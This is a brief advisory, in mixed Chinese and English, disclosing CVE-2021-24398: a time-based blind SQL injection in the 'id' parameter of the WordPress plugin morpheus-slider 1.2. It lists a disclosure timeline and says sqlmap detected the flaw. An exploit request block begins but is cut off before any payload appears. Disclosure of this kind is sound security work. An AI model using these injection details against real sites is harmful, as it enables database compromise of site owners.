关键漏洞信息 漏洞概述 Plugin Name: wp-plugin: morpheus-slider Affected Version: 1.2 (and most likely lower versions if any) Vulnerability Type: Injection Minimum Access Level: Administrator CVE Number: CVE-2021-24398 Identified by: Syed Sheeraz Ali 时间线 May 9, 2021: Issue Identified and Disclosed to WPScan May 13, 2021: Plugin Closed June 10, 2021: CVE Assigned August 22, 2021: Public Disclosure 技术细节 Vulnerable File: /init.php#983 Vulnerable Code: PoC Screenshots Vulnerability: The parameter 'id' is vulnerable to time-based blind SQL injection. Detected with Sqlmap: Sqlmap identified an injection point with 336 HTTP requests. Exploit Exploit Command: ```bash slider&width1=1200&height1=600&border1=10000&op41=1000&color31=4&op11=-1&op12=-1&op13=-1&op14=-1&font1=